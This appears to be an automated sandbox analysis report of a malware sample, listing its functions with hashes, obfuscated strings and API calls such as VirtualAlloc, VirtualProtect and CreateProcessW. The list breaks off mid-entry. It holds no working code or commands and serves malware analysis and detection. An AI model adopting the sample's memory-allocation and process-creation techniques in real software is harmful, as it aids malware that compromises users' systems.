                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 0-953603593
                                                                          • Opcode ID: 800af6ce736175144cf6d7cf1d25dae97df65d6f0d8078979c75f7a122c0ebf7
                                                                          • Instruction ID: 4459cc76b0598a2e80005346e48dd0ebcd518a488e4f86e4e285065ce838c42d
                                                                          • Opcode Fuzzy Hash: 800af6ce736175144cf6d7cf1d25dae97df65d6f0d8078979c75f7a122c0ebf7
                                                                          • Instruction Fuzzy Hash: E2F1E2B1E042689BEB248B14DC45BEAB779FF94314F1440FAD50DA6280D6B96FC1CF62
                                                                          Function 00833B8F Relevance: 24.4, APIs: 2, Strings: 14, Instructions: 394memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?), ref: 0083438B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 9b71441fb6d1126e432e4f4bae6a12f585d0aeab85f16eaaa501a52e261a24e8
                                                                          • Instruction ID: baa711b86b8efee9644235f27128d08ef5ef4f8300e3a0be3f9069ec57cfc653
                                                                          • Opcode Fuzzy Hash: 9b71441fb6d1126e432e4f4bae6a12f585d0aeab85f16eaaa501a52e261a24e8
                                                                          • Instruction Fuzzy Hash: A7E1D1B2E042589BFB20CA14DC45BEA7779FB94314F1480FAD80DA6680D6BD6FC58F52
                                                                          Function 00833DB2 Relevance: 24.4, APIs: 2, Strings: 14, Instructions: 387COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 267899455da79bd8df1ee6df6faf89e60f6bcc785185487b4eae92bb9a009225
                                                                          • Instruction ID: 04b8187f28fc3a995ca33e12c390bdf032ad27ee7c609a50ac41c9471077fa37
                                                                          • Opcode Fuzzy Hash: 267899455da79bd8df1ee6df6faf89e60f6bcc785185487b4eae92bb9a009225
                                                                          • Instruction Fuzzy Hash: 41E1D1B1E042689BEB248B14DC45BAAB779FF95310F1440FAD50DA7280D6B96FC1CF52
                                                                          Function 00833830 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 347COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: f5bf622275f4783406e02197729cd0a340bedb7899bd92d27e57f714b0da57e0
                                                                          • Instruction ID: 25fdf4c89930ee2d251127c4d2e6d9699ac67ed84e8d1e5f18c72fd4c3703a5f
                                                                          • Opcode Fuzzy Hash: f5bf622275f4783406e02197729cd0a340bedb7899bd92d27e57f714b0da57e0
                                                                          • Instruction Fuzzy Hash: D8D1F3B1E042989BFB20CA14DC45BEA7779FB95314F1440FAD40DA6280D2BD6FC58F52
                                                                          Function 00833B39 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 329COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 6b793046c2c40cce1eef75614cfb91bc6665852b90c6d1ceec0706b0832b0d56
                                                                          • Instruction ID: 6873d0eee949397bdcbeafcd57480747b23712b60212d571f20fbc0a027eada8
                                                                          • Opcode Fuzzy Hash: 6b793046c2c40cce1eef75614cfb91bc6665852b90c6d1ceec0706b0832b0d56
                                                                          • Instruction Fuzzy Hash: F5D1E2B1E042989BFB20CA14DC45BAA7B79FF95314F1480FAD40DA6280D6BD6FC58F52
                                                                          Function 008338B1 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 327COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: eec54dcb0ee4cb811a553bcce1a693b38a5c0ee3175834553959a8b8cb74cd77
                                                                          • Instruction ID: 754e129650d82ee16b2eadc1fab2420d9de57df523f105d97c1b6471bae85b92
                                                                          • Opcode Fuzzy Hash: eec54dcb0ee4cb811a553bcce1a693b38a5c0ee3175834553959a8b8cb74cd77
                                                                          • Instruction Fuzzy Hash: 57D1E1B1E042989BFB20CA14DC45BAA7B79FF95314F1480FAD40DA6280D6BD6FC58F52
                                                                          Function 008338E3 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 327COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: e05e022e92a12d25050ee2aba0a1c3d19f645d4cf1465ed9e8e73f8bf747af90
                                                                          • Instruction ID: e6f4a52fc7a788a999af3937173c8ca74c29927e15a912732060329975fa7e95
                                                                          • Opcode Fuzzy Hash: e05e022e92a12d25050ee2aba0a1c3d19f645d4cf1465ed9e8e73f8bf747af90
                                                                          • Instruction Fuzzy Hash: 8FD1E1B1E042989BFB20CA14DC45BAA7B79FF95314F1480FAD40DA6280D2BD6FC58F52
                                                                          Function 00833908 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 327COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: c2f671fa57be9bd7578ac07fd001ba5dcc721a829c87ae200d7258c0f8d111ed
                                                                          • Instruction ID: 86e1c2168dc3bf7d34bcf7ec70538f4c8483bd11f7c753b187cd7272f63993fe
                                                                          • Opcode Fuzzy Hash: c2f671fa57be9bd7578ac07fd001ba5dcc721a829c87ae200d7258c0f8d111ed
                                                                          • Instruction Fuzzy Hash: D7D1E1B1E042989BFB20CA14DC45BAA7B79FF95314F1480FAD40DA6280D2BD6FC58F52
                                                                          Function 00833CFB Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 326COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 79544b208adc6d524c2f6467958eff4e55265b315dcd1c76681ea343b584e711
                                                                          • Instruction ID: 7a7d29fb8c38eb30a3e5e8cbbc695aa241b0863ae2d786f5df51b0912c8ab79c
                                                                          • Opcode Fuzzy Hash: 79544b208adc6d524c2f6467958eff4e55265b315dcd1c76681ea343b584e711
                                                                          • Instruction Fuzzy Hash: C9D1E1B1E042989BFB20CA24DC45BAA7779FB95314F1440FAD40DA7280D6BE6FC58F52
                                                                          Function 00833EF3 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 487ecf50e16454b4646c1afc65c4090292075e671e62b24d680adeaaa720de48
                                                                          • Instruction ID: 0341ad5ea9169623273cc6c405cb48fd399cdce7a0f3d42b00d75f35a2eaaa37
                                                                          • Opcode Fuzzy Hash: 487ecf50e16454b4646c1afc65c4090292075e671e62b24d680adeaaa720de48
                                                                          • Instruction Fuzzy Hash: 33C102B1E042689BFB20CA14DC45BAAB779FB95314F1440FAD50DA7280D6BD6FC18F52
                                                                          Function 00833D21 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: cd74aebea5291fbd021b580ba2514b08d284b683cf718392c01395c8a83476e5
                                                                          • Instruction ID: 06d4e24be2c0049ac7e0d893186fa903dd811302e6ebb518a687d1d23880f40b
                                                                          • Opcode Fuzzy Hash: cd74aebea5291fbd021b580ba2514b08d284b683cf718392c01395c8a83476e5
                                                                          • Instruction Fuzzy Hash: 80C1E2B1E042689BFB20CA14DC45BAA7779FB95314F1440FAD50DA7280D6BD6FC18F62
                                                                          Function 00833B7E Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 80b45d74dc17ea3a66c84bbffb0c5b6cc78eb78668b1e542beceaa0452818371
                                                                          • Instruction ID: 391f3a11072a13c0ddce303b3179c7482bf8bb31b07901a2a0359b80bc2d3875
                                                                          • Opcode Fuzzy Hash: 80b45d74dc17ea3a66c84bbffb0c5b6cc78eb78668b1e542beceaa0452818371
                                                                          • Instruction Fuzzy Hash: 60C1E1A2E042989BF720CA14DC45BAA7779FF95314F1480FAD40DA6680D6BD6FC18F52
                                                                          Function 00833F0C Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 314COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 0837bf0a766968b65ab7c9de53c34a085fa44644fea64db43a9f8117d2963bdb
                                                                          • Instruction ID: 86d981c08db9d9f33b2dfd9388a98e40302dfd42bc6cae125b2fa59a7382db03
                                                                          • Opcode Fuzzy Hash: 0837bf0a766968b65ab7c9de53c34a085fa44644fea64db43a9f8117d2963bdb
                                                                          • Instruction Fuzzy Hash: DEC1E2B1E042589BFB20CA14DC45BAA7779FB95314F1440FAD50DA7280D6BD6FC18F52
                                                                          Function 008337FD Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 50a86e48c3375a2d2bce557f1edf291865b9d24b346c653da0854a9585d59d03
                                                                          • Instruction ID: c0329c3555abd7d991f65096758a76a9e66934605849e04b6cd6e5d9bc4d75e7
                                                                          • Opcode Fuzzy Hash: 50a86e48c3375a2d2bce557f1edf291865b9d24b346c653da0854a9585d59d03
                                                                          • Instruction Fuzzy Hash: 88B1F2A1E042989BFB20CB24DC45BAA7B79FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Function 008342C8 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 426d625fcf153122037d7a66ae85ec5d167ef82e409a7b98a07f87d49cbad5a2
                                                                          • Instruction ID: c2c1495fa8804995f842783a9e407d1448cb17568e2bc5947cc909ca6a1ebedb
                                                                          • Opcode Fuzzy Hash: 426d625fcf153122037d7a66ae85ec5d167ef82e409a7b98a07f87d49cbad5a2
                                                                          • Instruction Fuzzy Hash: E7B1E0A1E042989BFB20CB24DC45BAA7779FF95314F1480FAD40DA6680D6BD6FC18F52
                                                                          Function 00834097 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 1652e4b8c6b66cd85deb30cbc9dd59dc4944e11471895870d14e78c48576d4e6
                                                                          • Instruction ID: 226b8a02c59227b394089102b229ab17d1887a336a410a88c21bbc49acb3aa55
                                                                          • Opcode Fuzzy Hash: 1652e4b8c6b66cd85deb30cbc9dd59dc4944e11471895870d14e78c48576d4e6
                                                                          • Instruction Fuzzy Hash: 4AB1D0A1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Function 00834040 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 522f3cf6d7507f1f60e46d96c2955aed2b47c5a3e00d21559e54f02edcf3f32a
                                                                          • Instruction ID: 152185a1b5c0f65bf62da9143166ab4cb054ccd2d863255edcd4d17c84208b47
                                                                          • Opcode Fuzzy Hash: 522f3cf6d7507f1f60e46d96c2955aed2b47c5a3e00d21559e54f02edcf3f32a
                                                                          • Instruction Fuzzy Hash: 2AB1D0B1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Function 00834072 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 7fa15f018f33b8ad8750989d09cff491112b24fdde6257e026157953eea6e565
                                                                          • Instruction ID: da0f738fca329fe7bc6f5632370d9341cec264fa9d2bbe195ae162e8e734d284
                                                                          • Opcode Fuzzy Hash: 7fa15f018f33b8ad8750989d09cff491112b24fdde6257e026157953eea6e565
                                                                          • Instruction Fuzzy Hash: 71B1D0A1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Function 004B3C30 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 2949231068-4069139063
                                                                          • Opcode ID: 30ae39412df7fa3e190945b92cee27e17d7970d9fe7a9c4dd707e1a33dab4466
                                                                          • Instruction ID: d47e4a3c5e8a61b3bfb06d984711e1f3069a577937a9090fe7b59a438a4d0107
                                                                          • Opcode Fuzzy Hash: 30ae39412df7fa3e190945b92cee27e17d7970d9fe7a9c4dd707e1a33dab4466
                                                                          • Instruction Fuzzy Hash: 654129A1C096E88AFB109A64CC44BE57FB5BF51304F0480EED5C856683D67D4AD98B72
                                                                          Function 008346DA Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 287COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-4069139063
                                                                          • Opcode ID: 9321c485f48424b0423c89d8a3e83efb775634cddda772d2a2e1727787562694
                                                                          • Instruction ID: 07e430cffdb94876a662719910f5ed32d8d95a9971ff59cd57f156b7070220ff
                                                                          • Opcode Fuzzy Hash: 9321c485f48424b0423c89d8a3e83efb775634cddda772d2a2e1727787562694
                                                                          • Instruction Fuzzy Hash: 82B1E1A1D046A88AEB20CB24DC04BEAB775FF95304F1440F9D44DA7281D6B96EC1CF62
                                                                          Function 0087AE8E Relevance: 19.2, Strings: 15, Instructions: 490COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4=7=$L$L$NHAE$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-1619972170
                                                                          • Opcode ID: 82e88adacfb4c745d42cd19544d166a6902193a3b7c3c6a9e578f66dc44ba50a
                                                                          • Instruction ID: ec86b1699a0a9c845669cfa5332c0e3b6aa371be1b508a10672011e150094aff
                                                                          • Opcode Fuzzy Hash: 82e88adacfb4c745d42cd19544d166a6902193a3b7c3c6a9e578f66dc44ba50a
                                                                          • Instruction Fuzzy Hash: 0712F1B1D092A88AE7248B24DC447EABB75FF95304F0480FAD44DA6285E3799FC5CF52
                                                                          Function 0087A219 Relevance: 16.8, Strings: 13, Instructions: 577COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: b4f6158213ca7193bed9b7104fd994a33eacdc4f10eaaf489d9de6224c9f8434
                                                                          • Instruction ID: ad5f4af99abf79be6dd7e0f589b9f3dcac22d7c7f27dc6d741939438813e936a
                                                                          • Opcode Fuzzy Hash: b4f6158213ca7193bed9b7104fd994a33eacdc4f10eaaf489d9de6224c9f8434
                                                                          • Instruction Fuzzy Hash: FB32C0B1D092688BEB24CB14DC847EABB75FF91304F1481EAD40DA6285D3799FC58F52
                                                                          Function 00879ED3 Relevance: 16.8, Strings: 13, Instructions: 542COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 14b2a272af5594266abcd9aae0f873e369eeba7dce2c89dd4f77f5262e6b8ed1
                                                                          • Instruction ID: eba6a1217817f58669534aaf1fd829d0b6c80206f5b9f09c8579b066fad8aae0
                                                                          • Opcode Fuzzy Hash: 14b2a272af5594266abcd9aae0f873e369eeba7dce2c89dd4f77f5262e6b8ed1
                                                                          • Instruction Fuzzy Hash: B52215B1D082A88AE7248B24DC847EA7BB5FF95304F1480FAD44DE6285D7799FC58F12
                                                                          Function 0087A84D Relevance: 16.7, Strings: 13, Instructions: 457COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 0e8a7d0b74383875d5084c0380a4d2e405cefdf0d24b1d607689ad96a0a4cef8
                                                                          • Instruction ID: 3e736cd28bc26e2da6ffbbb3f3982f1ec5dcc80ca58f104d3da2e164b480a949
                                                                          • Opcode Fuzzy Hash: 0e8a7d0b74383875d5084c0380a4d2e405cefdf0d24b1d607689ad96a0a4cef8
                                                                          • Instruction Fuzzy Hash: 000214B1D082A88AEB248B24DC847EABB75FF51314F1480FAD44DA7285D2799FC5CF52
                                                                          Function 0087A94E Relevance: 16.7, Strings: 13, Instructions: 449COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 840591690a9e79aaa1accbf5c7c3391b1ccf6a9d332fa575bb30f982ec1e7a37
                                                                          • Instruction ID: dda29332eaa255c1b7e082043d6d1d8ed74445667330ecbd95e566b2b0dbeec7
                                                                          • Opcode Fuzzy Hash: 840591690a9e79aaa1accbf5c7c3391b1ccf6a9d332fa575bb30f982ec1e7a37
                                                                          • Instruction Fuzzy Hash: 7B0202B1D082A88AEB248B24DC847EABB75FF55314F0480FAD44DA7285D2799FC58F53
                                                                          Function 0087A467 Relevance: 16.6, Strings: 13, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: eee1b99dc534500dd04da8933707b8e5a2e25faad68ec1c28ffe03f858dbf628
                                                                          • Instruction ID: 617765efb616ab739be5d88f6a93f015fcbcd0b274ee48e11b9de6b7c8066ca6
                                                                          • Opcode Fuzzy Hash: eee1b99dc534500dd04da8933707b8e5a2e25faad68ec1c28ffe03f858dbf628
                                                                          • Instruction Fuzzy Hash: 81E115B1C092988AE7248A24DC887EB7B75FF91314F1480FAD44DA6285D3B99FC58F53
                                                                          Function 0083C123 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 369memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 8$n$n$x
                                                                          • API String ID: 544645111-2129689772
                                                                          • Opcode ID: dd658d19016bcac992c143b4bd4f9a9609bbe9b5ea5392c035b03477fd0653a2
                                                                          • Instruction ID: 0052699430fabc6334d671ad482a5a786128c2226b1ecdf34bf6af3ee105ad1f
                                                                          • Opcode Fuzzy Hash: dd658d19016bcac992c143b4bd4f9a9609bbe9b5ea5392c035b03477fd0653a2
                                                                          • Instruction Fuzzy Hash: 1CE18EB1D042289FEB24CB14DC95BEAB775FB84314F1481EAE90EA7240D6396EC5CF91
                                                                          Function 0086BEA0 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 528processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,FFFFA50C,FFFFBE18), ref: 0086CADD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
